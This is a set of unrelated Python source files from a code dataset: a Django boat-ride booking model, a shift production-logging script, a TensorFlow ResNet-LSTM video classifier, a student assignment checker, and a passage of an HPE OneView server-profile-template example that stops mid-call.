self.desembarque_lat_long = self.ponto_desembarque.localizacao\n\n if not self.cor:\n self.cor = settings.CORES_CHAMADAS[random.randint(0, len(settings.CORES_CHAMADAS)-1)]\n\n if self.preco_model:\n self.preco = self.preco_model.preco\n\n if not self.status == 0:\n if self.desistenciapassageiro_set.count() > 0:\n self.status = 1\n elif self.data_desembarque:\n self.status = 6\n elif self.data_embarque:\n self.status = 5\n elif self.aceite_piloto:\n self.status = 4\n elif self.data_chamada:\n self.status = 3\n else:\n self.status = 0\n\n super(Viagem, self).save(*args, **kwargs)\n\n def preco_total(self):\n\n if self.preco and self.preco > 0:\n return self.preco * self.quantidade\n else:\n return 0\n\n\n def chamada_json(self):\n\n chamada = {}\n chamada['data_chamada'] = self.data_chamada.isoformat()\n chamada['embarque'] = self.embarque\n chamada['quantidade'] = self.quantidade\n chamada['embarque_lat'] = float(self.embarque_lat_long.split(\", \")[0])\n chamada['embarque_lng'] = float(self.embarque_lat_long.split(\", \")[1])\n chamada['desembarque'] = self.desembarque\n if self.desembarque_lat_long:\n chamada['desembarque_lat'] = float(self.desembarque_lat_long.split(\", \")[0])\n chamada['desembarque_lng'] = float(self.desembarque_lat_long.split(\", \")[1])\n chamada['quantidade'] = self.quantidade\n chamada['passageiro_nome'] =self.passageiro.nome\n chamada['tempo_de_espera'] = self.tempo_espera_lista_chamada()\n chamada['cor'] = self.cor\n chamada['pk'] = self.pk\n\n return chamada\n\n def aceite_json(self):\n\n aceite = self.chamada_json()\n aceite['aceite_piloto'] = self.aceite_piloto\n\n if self.barco:\n aceite['barco'] = self.barco.to_json()\n else:\n aceite['barco'] = None\n\n if self.piloto:\n aceite['piloto'] = self.piloto.to_json()\n else:\n aceite['piloto'] = None\n\n if self.data_embarque:\n aceite['data_embarque'] = self.data_embarque\n else:\n aceite['data_embarque'] = None\n\n if self.data_desembarque:\n aceite['data_desembarque'] = self.data_desembarque\n else:\n aceite['data_desembarque'] = None\n\n aceite['tempo_de_espera'] = self.tempo_de_espera()\n\n if self.preco:\n aceite['preco'] = str(self.preco).replace(\".\", \",\")\n aceite['total'] = str(self.preco * self.quantidade).replace(\".\", \",\")\n aceite['preco_pk'] = self.preco_model.pk\n\n else:\n aceite['preco_pk'] = None\n aceite['preco'] = None\n aceite['total'] = None\n\n return aceite\n\n def tempo_espera_lista_chamada(self):\n\n if self.data_chamada and not self.data_embarque:\n remain = datetime.datetime.today() - self.data_chamada\n minutes, seconds = divmod(remain.seconds, 60)\n if minutes > 0:\n return \"{0}m\".format(minutes, seconds)\n elif minutes == 0 and seconds > 0:\n return \"{0}s\".format(seconds)\n else:\n return 0\n\n def espera_min_sec(self):\n if self.data_embarque and self.data_chamada:\n remain = self.data_embarque - self.data_chamada\n minutes, seconds = divmod(remain.seconds, 60)\n return {\"min\": minutes, \"sec\": seconds}\n elif self.data_chamada and not self.data_embarque:\n remain = datetime.datetime.today() - self.data_chamada\n minutes, seconds = divmod(remain.seconds, 60)\n return {\"min\": minutes, \"sec\": seconds}\n\n def tempo_de_espera(self):\n\n t = self.espera_min_sec()\n if t:\n if t['min'] > 0 and t['sec'] > 0:\n return \"{0}m:{1}s\".format(t['min'], t['sec'])\n elif t['min'] == 0 and t['sec'] > 0:\n return \"{0}s\".format(t['sec'])\n elif t['min'] > 0 and t['sec'] == 0:\n return \"{0}m\".format(t['min'])\n\n elif self.data_chamada and not self.data_embarque:\n\n if 
t['min'] > 0 and t['sec'] > 0:\n return \"Esperando: {0}m:{1}s\".format(t['min'], t['sec'])\n elif t['min'] == 0 and t['sec'] > 0:\n return \"Esperando: {0}s\".format(t['sec'])\n elif t['min'] > 0 and t['sec'] == 0:\n return \"Esperando: {0}m\".format(t['min'])\n\n def resumo_json(self):\n\n v = {}\n v[\"preco\"] = self.preco\n v[\"preco_total\"] = str(self.preco * self.quantidade).replace(\".\", \",\")\n v[\"quantidade\"] = self.quantidade\n v[\"tempo_espera\"] = self.tempo_de_espera()\n v[\"embarque\"] = self.embarque\n v[\"desembarque\"] = self.desembarque\n v[\"nota_classificacao\"] = self.nota_classificacao\n\n if self.piloto:\n v[\"piloto\"] = self.piloto.nome\n else:\n v[\"piloto\"] = None\n if self.barco:\n v[\"barco\"] = self.barco.nome\n else:\n v[\"barco\"] = None\n if self.data_embarque:\n v[\"data_embarque\"] = self.data_embarque.strftime(\"%d/%m/%Y %H:%M\")\n else:\n v[\"data_embarque\"] = None\n\n\n\n return v\n\n\n def __unicode__(self):\n return u\"{0} - {1} - {2}pax\".format(self.data_chamada.strftime(\"%d/%m/%Y %H:%M\"), self.passageiro.nome, self.quantidade)\n\n class Meta:\n verbose_name_plural = 'Viagens'\n\n\nclass DesistenciaPiloto(models.Model):\n\n piloto = models.ForeignKey(Piloto, null=True, blank=True)\n viagem = models.ForeignKey(Viagem, null=True, blank=True, on_delete=models.SET_NULL)\n motivo = models.TextField(null=True, blank=True)\n data_desistencia = models.DateTimeField(auto_now_add=True, null=True, blank=True)\n\n class Meta:\n verbose_name = 'Desistência piloto'\n verbose_name_plural = 'Desistências piloto'\n\nclass DesistenciaPassageiro(models.Model):\n\n passageiro = models.ForeignKey(Passageiro, null=True, blank=True)\n viagem = models.ForeignKey(Viagem, null=True, blank=True, on_delete=models.SET_NULL)\n data_desistencia = models.DateTimeField(auto_now_add=True, null=True, blank=True)\n piloto = models.ForeignKey(Piloto, null=True, blank=True, on_delete=models.SET_NULL)\n\n class Meta:\n verbose_name = 'Desistência passageiro'\n verbose_name_plural = 'Desistências passageiro'\n\n\n'''\n\n$scope.localizacao_barco_fake = [\n\"-23.004665, -43.307942\",\n\"-23.005258, -43.308468\",\n\"-23.005544, -43.309712\",\n\"-23.005406, -43.310774\",\n\"-23.005050, -43.311289\",\n\"-23.004527, -43.311783\",\n\"-23.003737, -43.311729\",\n\"-23.003194, -43.311472\",\n\"-23.002670, -43.311086\",\n\"-23.002028, -43.310828\",\n\"-23.001366, -43.310549\",\n\"-23.001070, -43.310217\",\n\"-23.001080, -43.309380\",\n\"-23.001031, -43.308682\",\n\"-23.001001, -43.307674\",\n\"-23.001574, -43.307137\",\n\"-23.002591, -43.307180\",\n\"-23.003608, -43.307524\",\n\"-23.004142, -43.307770\"\n];\n'''\n\n","sub_path":"website/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":14561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"640199994","text":"# Shipheus\n# 4/10/18\n# MicroDon.py\n\nimport datetime\n\n###################START FUNCTIONS###################################\ndef newPage():\n print('\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n')\n\ndef inquire():\n area = int(input('''\\nPlease choose work area.\n *********\n 1. MGB\n 2. Topcoat\n 3. Dress\n **********\n '''))\n if (area == 2):\n booth = input('What booth? ')\n else:\n booth = ''\n if(area == 1):\n mask = input('How many parts did you mask? \\n')\n grit = input('How many parts did you grit blast? \\n')\n bond = input('How many parts did you bond coat? 
\\n')\n eos = ''\n bos = ''\n p_s = ''\n p_f = ''\n else:\n bos = int(input('''\\nWas there a part in process at the beginning of shift?\n **********\n 1- yes\n 2- no\n **********\n '''))\n p_s = int(input('How many parts did you start? \\n')) #parts_start\n p_f = int(input('How many parts did you finish? \\n'))#parts_finish\n eos = int(input('''\\nWas there a part in process at the end of shift?\n **********\n 1- yes\n 2- no\n **********\n '''))\n mask = ''\n grit = ''\n bond = ''\n return area, bos, p_s, p_f, eos, mask, grit, bond, booth\n\ndef decode(shift, area, bos, p_s, p_f, eos, mask, grit, bond, booth):\n shift = shift + ' shift'\n if(area == 1):\n area = 'MGB'\n mask = mask + ' parts masked.'\n grit = grit + ' parts gritblasted.'\n bond = bond + ' parts bondcoated.'\n p_s = ''\n p_f = ''\n elif(area == 2):\n area = 'Topcoat'\n booth = 'Booth ' + str(booth)\n else:\n area = 'Dress'\n if(bos == 1):\n bos = 'There was part in progress at bos.'\n elif(bos == 2):\n bos = ''\n if(eos == 1):\n eos = 'There was a part in progress at eos.'\n elif(eos == 2):\n eos = ''\n if(area != 'MGB'):\n p_s = str(p_s) + ' parts started.'\n p_f = str(p_f) + ' parts finished.'\n return area, bos, eos, mask, grit, bond, p_s, p_f, booth\n \ndef preview(shift, area, bos, p_s, p_f, eos, mask, grit, bond, booth):\n print('\\n************************************\\n\\n' \\\n + str(datetime.date.today()) + ' \\n' + shift)\n print('Area: ' + area)\n if(area == 'Topcoat'):\n print(booth)\n print()\n if(area == 'MGB'):\n print(mask)\n print(grit)\n print(bond)\n if(bos != ''):\n print(bos)\n if(area != 'MGB'):\n print(p_s)\n print(p_f)\n if(eos != ''):\n print(eos)\n print('\\n************************************')\n \ndef output(shift, trapdoor, gdopt, area, bos, p_s, p_f, eos, mask, grit, bond, booth, fileName):\n if(trapdoor == '' and gdopt == 1): \n f = open(fileName + '.txt','a')\n outPut = (str(datetime.date.today()) \\\n + ' :: ' + shift + ' :: Area: ' + area + ':: ' + booth +'\\n\\n' + mask + ': '\\\n + grit + ': ' + bond + ': ' + bos + ': ' + p_s + ': ' + p_f + ': ' + eos \\\n + '\\n' + '************************************\\n')\n f.write(outPut)\n f.close()\n\ndef admin(fileName):\n boss = input('''\\nWelcome Leadman,\nWhat would you like to do?\\n\n1- View production\n2- clear all\\n''')\n \n if(boss == '1'):\n f = open(fileName + '.txt', 'r')\n show = f.read()\n print('\\n************************************\\n' + show)\n f.close()\n elif(boss == '2'):\n safe = input(\"\\nAre you sure?\\n1 = yes\\n2 = no\\n\")\n if(safe == '1'):\n f = open(fileName + '.txt', 'w')\n f.write('')\n f.close()\n else:\n print('clear all aborted.') \n\ndef main():\n gdopt = 2\n \n # Name file\n if (datetime.datetime.now().hour >= 0 and datetime.datetime.now().hour < 7):\n shift = '3rd Shift'\n elif (datetime.datetime.now().hour >= 7 and datetime.datetime.now().hour <= 15 ):\n if (datetime.datetime.now().hour == 15 and datetime.datetime.now().minute >= 30):\n shift = '2nd Shift'\n else:\n shift = '1st Shift'\n else:\n shift = '2nd Shift'\n \n fileName = str(datetime.date.today()) + '-' + shift\n \n trapdoor = 'pizza'\n \n print(\"Let's see what you've done today.\")\n trapdoor = input(\"Press enter to continue.\\n\")\n while (trapdoor != \"\" and trapdoor != 'theprodigaldon'):\n trapdoor = input(\"\\nError: try again.\\nPress enter to continue.\")\n while (trapdoor != \"theprodigaldon\" and gdopt != 1):\n area, bos, p_s, p_f, eos, mask, grit, bond, booth = inquire()\n area, bos, eos, mask, grit, bond, p_s, p_f, booth = 
decode(shift, area, bos, p_s, p_f, eos, mask, grit, bond, booth)\n        preview(shift, area, bos, p_s, p_f, eos, mask, grit, bond, booth)\n        gdopt = int(input('''\\nDoes this look right?\n        **********\n        1- yes\n        2- no\n        **********\n        '''))\n        if(gdopt == 1):\n            output(shift, trapdoor, gdopt, area, bos, p_s, p_f, eos, mask, grit, bond, booth, fileName)\n        \n    if(trapdoor == \"theprodigaldon\"):\n        admin(fileName)\n    lchance = input('\\nWhat would you like to do next?\\n1 = Exit\\n2 = Rerun\\n')\n    if(lchance == '1'):\n        print('\\nThanks for using MicroDon, Goodbye.')\n    return lchance\n    \n##############################END FUNCTIONS####################################\n\nlchance = '2'\nwhile(lchance == '2'):\n    lchance = main()\n","sub_path":"MicroDon.proj/MicroDon.py","file_name":"MicroDon.py","file_ext":"py","file_size_in_byte":5401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"566108456","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nAuthor:XiyouZhaoC\nResidual network and LSTM\nThis code runs on the TensorFlow 0.10.0 platform.\nIt uses a residual network (ResNet38, a CNN) to extract features and\n    a single-layer LSTM to process the sequence data.\n\nThe UFC11 dataset contains 1600 videos that have been classified into 11 classes.\n\"\"\"\nimport tensorflow as tf\nimport process_data as pd\nimport sys\n\nfrom collections import namedtuple\nfrom math import sqrt\n\n\n# Dataset count\nn_train_example = 33528\nn_test_example = 4872\n\n# Network Parameter\nlearning_rate = 0.001\n\npic_batch_size = 2400 # must be divisible by fps\nfps = 24\nvideo_batch_size = pic_batch_size / fps\nn_classes = 11\n\n\n# LSTM Parameter\nn_hidden_units = 384\n\n\n\"\"\"\n2D Convolution with options for kernel size,stride and init deviation\nx:tensor--input tensor to convolution\nn_filters:int--Number of filters to apply\nk_h,k_w:int--kernel height/width\nstride_h,stride_w:int--Stride in rows/cols\nstddev:float--Initialization's standard deviation\nactivation:arguments--Function which applies a nonlinearity\npadding:str--'SAME' or 'VALID'\n\"\"\" \ndef conv2d(x,\n           n_filters,\n           k_h=5,k_w=5,\n           stride_h=2,stride_w=2,\n           stddev=0.1,\n           activation=None,\n           bias=True,\n           padding='SAME',\n           name='Conv2D'):\n    with tf.variable_scope(name):\n        w = tf.get_variable(\n            'w',[k_h,k_w,x.get_shape()[-1],n_filters],\n            initializer=tf.truncated_normal_initializer(stddev=stddev))\n        conv = tf.nn.conv2d(x,w,\n                            strides=[1,stride_h,stride_w,1],\n                            padding=padding)\n        if bias:\n            b = tf.get_variable('b',\n                                [n_filters],\n                                initializer=tf.truncated_normal_initializer(stddev=stddev))\n            conv = tf.nn.bias_add(conv,b)\n        if activation:\n            conv = activation(conv)\n        return conv \n\ndef residual_network(x,\n                     activation=tf.nn.relu):\n    LayerBlock = namedtuple(\n        'LayerBlock',['num_repeats','num_filters','bottleneck_size'])\n    blocks = [LayerBlock(3,128,32),\n              LayerBlock(3,256,64),\n              LayerBlock(3,512,128),\n              LayerBlock(3,1024,256)]\n    input_shape = x.get_shape().as_list()\n    \n    if len(input_shape) == 2:\n        ndim = int(sqrt(input_shape[1]))\n        if ndim*ndim!=input_shape[1]:\n            raise ValueError('input_shape should be square')\n        x = tf.reshape(x,[-1,ndim,ndim,1])\n    \n    print('input layer,shape = {0}'.format(x.get_shape()))#[batch_size,28,28,1] (shape comments assume a 28*28 input)\n    # First convolution expands to 64 channels and downsamples\n    net = conv2d(x,64,k_h=7,k_w=7,\n                 name='conv1',activation=activation)#padding=SAME,stride=2\n    print('conv1,shape = {0}'.format(net.get_shape()))#[batch_size,14,14,64]\n    \n    # Max Pool 3*3 kernel pool,stride=2,padding=SAME(kernel-1)/2\n    net =
 tf.nn.max_pool(net,[1,3,3,1],\n                         strides=[1,2,2,1],padding='SAME')\n    print('max pool1,shape = {0}'.format(net.get_shape()))#[batch,7,7,64]\n    \n    # Setup first chain of resnets with a 1*1 convolution\n    net = conv2d(net,blocks[0].num_filters,k_h=1,k_w=1,\n                 stride_h=1,stride_w=1,padding='VALID',name='conv2')\n    print('conv2,shape = {0}'.format(net.get_shape()))#[batch,7,7,128]\n    \n    print('Residual Networks:')\n    # Loop through all res blocks\n    for block_i,block in enumerate(blocks):\n        for repeat_i in range(block.num_repeats):\n            name = 'block_%d/repeat_%d'%(block_i,repeat_i)\n            \n            print('{0} start......'.format(name))\n            \n            conv = conv2d(net,block.bottleneck_size,k_h=1,k_w=1,\n                          stride_h=1,stride_w=1,padding='VALID',\n                          activation=activation,\n                          name=name+'/conv_in')\n            print('{0}/conv_in,shape = {1}'.format(name,conv.get_shape()))\n            # 1*1 convolution [batch,7,7,bottleneck_size]\n            \n            conv = conv2d(conv,block.bottleneck_size,k_h=3,k_w=3,\n                          padding='SAME',stride_h=1,stride_w=1,\n                          activation=activation,\n                          name=name+'/conv_bottleneck')\n            print('{0}/conv_bottleneck,shape = {1}'.format(name,conv.get_shape()))\n            # 3*3 convolution [batch,7,7,bottleneck_size] (stride=1 and padding=SAME keep the spatial dimensions unchanged)\n            \n            conv = conv2d(conv,block.num_filters,k_h=1,k_w=1,\n                          padding='VALID',stride_h=1,stride_w=1,\n                          activation=activation,\n                          name=name+'/conv_out')\n            print('{0}/conv_out,shape = {1}'.format(name,conv.get_shape()))\n            # 1*1 convolution [batch,7,7,num_filters]\n            \n            net = conv + net\n            print('{0}/merge,shape = {1}'.format(name,net.get_shape()))\n            # [batch,7,7,num_filters]\n            \n        try:\n            print('===========================================================')\n            print('Next Block (Upscale)')# increase the channel dimension\n            next_block = blocks[block_i+1]\n            name_s = 'block_{0}/conv_upscale'.format(block_i)\n            net = conv2d(net,next_block.num_filters,k_h=1,k_w=1,\n                         padding='SAME',stride_h=1,stride_w=1,bias=False,name=name_s)\n            print('{0},shape = {1}'.format(name_s,net.get_shape()))\n        except IndexError:\n            pass\n    \n    # Average Pool\n    net = tf.nn.avg_pool(net,\n                         ksize=[1,net.get_shape().as_list()[1],\n                                net.get_shape().as_list()[2],1],\n                         strides=[1,1,1,1],padding='VALID')\n    print('Average Pool,shape = {0}'.format(net.get_shape()))# 7*7 average pooling\n    net = tf.reshape(\n        net,\n        [-1, net.get_shape().as_list()[1] *\n         net.get_shape().as_list()[2] *\n         net.get_shape().as_list()[3]])\n    print('After residual network shape = {0}'.format(net.get_shape()))\n    \n    return net\n\n\n    \ndef lstm_layer(x):\n    \n    print('============================LSTM==================================')\n    \n    # x :[pic_batch_size,1024]\n    # transpose to [video_batch_size,fps,1024]\n    # get input \n    n_inputs = x.get_shape().as_list()[-1]\n    print('LSTM Layer n_inputs={0}'.format(n_inputs)) \n\n    # Define weights\n    weights = {\n        #(n_inputs=1024,n_hidden_units=384)\n        'in':tf.Variable(tf.random_normal([n_inputs,n_hidden_units])),\n        #(n_hidden_units=384,n_classes=11)\n        'out':tf.Variable(tf.random_normal([n_hidden_units,n_classes]))\n    }\n    biases = {\n        #(n_hidden_units=384,)\n        'in':tf.Variable(tf.constant(0.1,shape=[n_hidden_units,])),\n        #(n_classes=11,)\n        'out':tf.Variable(tf.constant(0.1,shape=[n_classes,]))\n    }\n    \n    # x[pic_batch,n_inputs] ==> [video_batch_size,fps,n_inputs]\n    x = tf.reshape(x,[-1,fps,n_inputs])\n    # x[video_batch_size,fps,n_inputs] ==> [video_batch_size * fps,n_inputs]\n    x = tf.reshape(x,[-1,n_inputs])\n    # x_in ==> (video_batch_size * fps,n_hidden_units)\n    x_in = tf.matmul(x,weights['in']) + biases['in']\n    # x_in ==> (video_batch_size,fps,n_hidden_units)\n    x_in = tf.reshape(x_in,[-1,fps,n_hidden_units])\n    \n    # cell\n    # forget_bias = 1.0 lets all information pass
 through the LSTM cell\n    lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(n_hidden_units,\n                                             forget_bias=1.0,\n                                             state_is_tuple=True)\n    _init_state = lstm_cell.zero_state(video_batch_size,dtype=tf.float32)\n    outputs,states = tf.nn.dynamic_rnn(lstm_cell,\n                                       x_in,\n                                       initial_state=_init_state,\n                                       time_major=False\n                                       )\n    #==================================DEBUG===================================\n    \n    # [video_batch_size,fps,n_hidden_units]\n    print('After LSTM layer dynamic run,output shape = {0}'.format(outputs.get_shape()))\n    # \n    # print(type(states))\n    # print('!! 2',states.get_shape())\n    #==================================DEBUG===================================\n    \n    # unpack to list[(video_batch_size,outputs)*fps]\n    # transpose:[video_batch_size,fps,n_hidden_units]\n    # ==> [fps,video_batch_size,n_hidden_units]\n    outputs = tf.unpack(tf.transpose(outputs,[1,0,2]))\n    #==================================DEBUG===================================\n    # print(type(outputs))#list\n    # print(len(outputs))# fps\n    # print(outputs[0].get_shape())#[video_batch_size,n_hidden_units]\n    # After the transpose and unpack above, outputs is a list of [(batch, outputs) * steps];\n    # outputs[-1] is the LSTM output after the last step, and a softmax regression on it\n    # yields the classification result.\n    #==================================DEBUG===================================\n    \n    results = tf.matmul(outputs[-1],weights['out']) + biases['out']\n    return results\n    \ndef train_res_lstm(width=256,height=256):\n    print('...... loading the dataset ......')\n    train_set_x,train_set_y,test_set_x,test_set_y = pd.load_data_set(width,height)\n    \n    print('...... building the model ......')\n    x = tf.placeholder(tf.float32,[None,width*height])\n    y = tf.placeholder(tf.float32,[None,n_classes])\n    y_res = residual_network(x)\n    y_pred = lstm_layer(y_res)\n    \n    # Define loss and training functions\n    cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(y_pred,y))\n    optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)\n    \n    # Monitor Accuracy\n    correct_prediction = tf.equal(tf.argmax(y_pred,1),tf.argmax(y,1))\n    accuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))\n\n    best_acc = 0.\n    \n    init = tf.initialize_all_variables()\n    # Session\n    with tf.Session() as sess:\n        print('...... initializing variables ...... ')\n        sess.run(init)\n        \n        n_epochs = 100\n        print('......
 starting training ......')\n        for epoch_i in range(n_epochs):\n            # Training \n            train_accuracy = 0.\n            for batch_i in range(n_train_example//pic_batch_size):\n                \n                batch_xs = train_set_x[batch_i*pic_batch_size:(batch_i+1)*pic_batch_size]\n                batch_ys = train_set_y[batch_i*video_batch_size:(batch_i+1)*video_batch_size]\n                _,loss,acc = sess.run([optimizer,cost,accuracy],\n                                      feed_dict={\n                                          x:batch_xs,\n                                          y:batch_ys}\n                                      )\n                #print('epoch:{0},minibatch:{1},y_res:{2}'.format(epoch_i,batch_i,yy_res))\n                #print('epoch:{0},minibatch:{1},y_pred:{2}'.format(epoch_i,batch_i,yy_pred))\n                print('epoch:{0},minibatch:{1},cost:{2},train_accuracy:{3}'.format(epoch_i,batch_i,loss,acc))\n                train_accuracy += acc\n\n            train_accuracy /= (n_train_example//pic_batch_size)\n            print('----epoch:{0},training acc = {1}'.format(epoch_i,train_accuracy))\n            \n            # Validation\n            valid_accuracy = 0.\n            for batch_i in range(n_test_example//pic_batch_size):\n                batch_xs = test_set_x[batch_i*pic_batch_size:(batch_i+1)*pic_batch_size]\n                batch_ys = test_set_y[batch_i*video_batch_size:(batch_i+1)*video_batch_size]\n                valid_accuracy += sess.run(accuracy,\n                                           feed_dict={\n                                               x:batch_xs,\n                                               y:batch_ys})\n            valid_accuracy /= (n_test_example//pic_batch_size)\n            print('epoch:{0},train_accuracy:{1},valid_accuracy:{2}'.format(epoch_i,train_accuracy,valid_accuracy))\n            if(train_accuracy > best_acc):\n                best_acc = train_accuracy\n        \n    print('...... training finished ......')\n    print('...... best accuracy: {0} ......'.format(best_acc))\n\n\nif __name__ == '__main__':\n    \n    # width and height are optional command line arguments; checking the length\n    # of sys.argv avoids an IndexError when the script is run without them\n    if len(sys.argv) > 2:\n        print('...... training res and lstm network:width = {0},height = {1}'.format(sys.argv[1],sys.argv[2]))\n        w = int(sys.argv[1])\n        h = int(sys.argv[2])\n        train_res_lstm(width=w,height=h)\n    else: \n        print('...... training res and lstm default net:width = 256,height = 256')\n        train_res_lstm()\n","sub_path":"UFC11/ufc11_res_lstm.py","file_name":"ufc11_res_lstm.py","file_ext":"py","file_size_in_byte":12676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"252916798","text":"import sys\nsys.path.insert(0, 'pyta')\n\nprint(\"================= Start: checking coding style =================\")\n\nimport python_ta\npython_ta.check_all('admission_functions.py', config='pyta/a1_pyta.txt')\n\nprint(\"================= End: checking coding style =================\\n\")\n\nprint(\"================= Start: checking parameter and return types =================\")\n\nimport builtins\n\n# Check for use of functions print and input.\n\n# IMPORTANT!\n# If you are getting a syntax error here for the line:\n# our_print = print\n# Then you are using the wrong version of Python! 
\nour_print = print\nour_input = input\n\n\ndef disable_print(*args):\n raise Exception(\"You must not call print anywhere in your code!\")\n\ndef disable_input(*args):\n raise Exception(\"You must not call input anywhere in your code!\")\n\n\nbuiltins.print = disable_print\nbuiltins.input = disable_input\n\nimport admission_functions as af\n\n# Get the initial values of the constants\nconstants_before = [af.SPECIAL_CASE_SCHOOL_1,\n af.SPECIAL_CASE_SCHOOL_2,\n af.SPECIAL_CASE_YEAR]\n\n\nresult = af.is_special_case('Jacqueline Smith,Best High School,2002,MAT,90,94,ENG,92,88,CHM,80,85,BArts')\nassert isinstance(result, bool), \\\n '''af.is_special_case should return a bool, but returned {0}\n '''.format(type(result))\n\n\n# Type check af.get_final_mark\nrecord = 'Paul Gries,Ithaca High School,1986,BIO,60,70,CHM,80,90,CAT,10,20,BEng'\nresult = af.get_final_mark(record, '10', '20')\nassert isinstance(result, float), \\\n '''af.get_final_mark should return a float, but returned {0}\n '''.format(type(result))\n\n\n# Type check af.get_both_marks\nresult = af.get_both_marks('ABC,10,20', 'ABC')\nassert isinstance(result, str), \\\n '''af.get_both_marks should return a str, but returned {0}\n '''.format(type(result))\n\n\n# Type check af.extract_course\nresult = af.extract_course('ABC,10,20', 1)\nassert isinstance(result, str), \\\n '''af.extract_course should return a str, but returned {0}\n '''.format(type(result))\n\n\n# Type check af.applied_to_degree\nrecord = 'Paul Gries,Ithaca High School,1986,BIO,60,70,CHM,80,90,CAT,95,96,BEng'\nresult = af.applied_to_degree(record, 'BEng')\nassert isinstance(result, bool), \\\n '''af.applied_to_degree should return a bool, but returned {0}\n '''.format(type(result))\n\n\n# Type check af.decide_admission\nvalid_strings = ['accept', 'reject', 'accept with scholarship']\nfor x in [18, 22, 30]:\n result = af.decide_admission(x, 20)\n assert isinstance(result, str), \\\n '''af.decide_admission should return a str, but returned {0}\n '''.format(type(result))\n assert result.strip().lower() in valid_strings, \\\n '''af.decide_admission should return one of {0}, but returned {1}\n '''.format(\"'\" + \"', '\".join(valid_strings) + \"'\", \"'\" + result + \"'\")\n\nbuiltins.print = our_print\nbuiltins.input = our_input\n\nprint(\"================= End: checking parameter and return types =================\\n\")\n\nprint(\"================= Start: checking whether constants are unchanged =================\")\n\n# Get the final values of the constants\nconstants_after = [af.SPECIAL_CASE_SCHOOL_1,\n af.SPECIAL_CASE_SCHOOL_2,\n af.SPECIAL_CASE_YEAR]\n\n\n# Check whether the constants are unchanged.\nassert constants_before == constants_after, \\\n \"\"\"Your function(s) modified the value of a constant(s). 
Edit your code\n    so that the values of constants are unchanged by your functions.\"\"\"\nprint(\"================= End: checking whether constants are unchanged =================\\n\")\n\n\n\nprint(\"The parameter and return type checker passed.\")\nprint(\"This means we will be able to test your code.\")\nprint(\"It does NOT mean your code is necessarily correct.\")\nprint(\"You should run your own thorough tests to convince yourself your code is correct.\")\nprint()\nprint(\"Scroll up to review the output of checking coding style.\")\n\n\n","sub_path":"2018summer/A1/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":3935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"611389906","text":"# -*- coding: utf-8 -*-\n###\n# (C) Copyright (2012-2019) Hewlett Packard Enterprise Development LP\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n###\n\nfrom pprint import pprint\nfrom hpOneView.oneview_client import OneViewClient\nfrom config_loader import try_load_from_file\n\nconfig = {\n    \"ip\": \"\",\n    \"credentials\": {\n        \"userName\": \"\",\n        \"password\": \"\"\n    },\n    \"api_version\": 800\n}\n\n# Try to load config from a file (if there is a config file)\nconfig = try_load_from_file(config)\noneview_client = OneViewClient(config)\nprofile_templates = oneview_client.server_profile_templates\n\n# Dependency resources\nhardware_types = oneview_client.server_hardware_types\nenclosure_groups = oneview_client.enclosure_groups\n\n# These variables must be defined according to your environment\nserver_profile_name = \"ProfileTemplate101\"\nhardware_type_name = \"SY 480 Gen9 1\"\nenclosure_group_name = \"SYN03_EC\"\nhardware_type_for_transformation = \"SY 480 Gen9 2\"\nenclosure_group_for_transformation = \"SYN03_EC\"\n\nhardware_type = hardware_types.get_by_name(hardware_type_name)\nenclosure_group = enclosure_groups.get_by_name(enclosure_group_name)\n\n# Get all\nprint(\"\\nGet list of all server profile templates\")\nall_templates = profile_templates.get_all()\nfor template in all_templates:\n    print('   %s' % template['name'])\n\n# Get Server Profile Template by scope_uris\nif oneview_client.api_version >= 600:\n    server_profile_templates_by_scope_uris = profile_templates.get_all(\n        scope_uris=\"\\\"'/rest/scopes/3bb0c754-fd38-45af-be8a-4d4419de06e9'\\\"\")\n    if len(server_profile_templates_by_scope_uris) > 0:\n        print(\"Found %d Server profile Templates\" % (len(server_profile_templates_by_scope_uris)))\n        i = 0\n
        while i < len(server_profile_templates_by_scope_uris):\n            print(\"Found Server Profile Template by scope_uris: '%s'.\\n uri = '%s'\" % (server_profile_templates_by_scope_uris[i]['name'],\n                                                                                 server_profile_templates_by_scope_uris[i]['uri']))\n            i += 1\n        pprint(server_profile_templates_by_scope_uris)\n    else:\n        print(\"No Server Profile Template found.\")\n\n# Get by property\nprint(\"\\nGet a list of server profile templates that match the specified macType\")\ntemplate_mac_type = all_templates[1][\"macType\"]\ntemplates = profile_templates.get_by('macType', template_mac_type)\nfor template in templates:\n    print('   %s' % template['name'])\n\n# Get available networks\nprint(\"\\nGet available networks\")\navailable_networks = profile_templates.get_available_networks(enclosureGroupUri=enclosure_group.data[\"uri\"],\n                                                               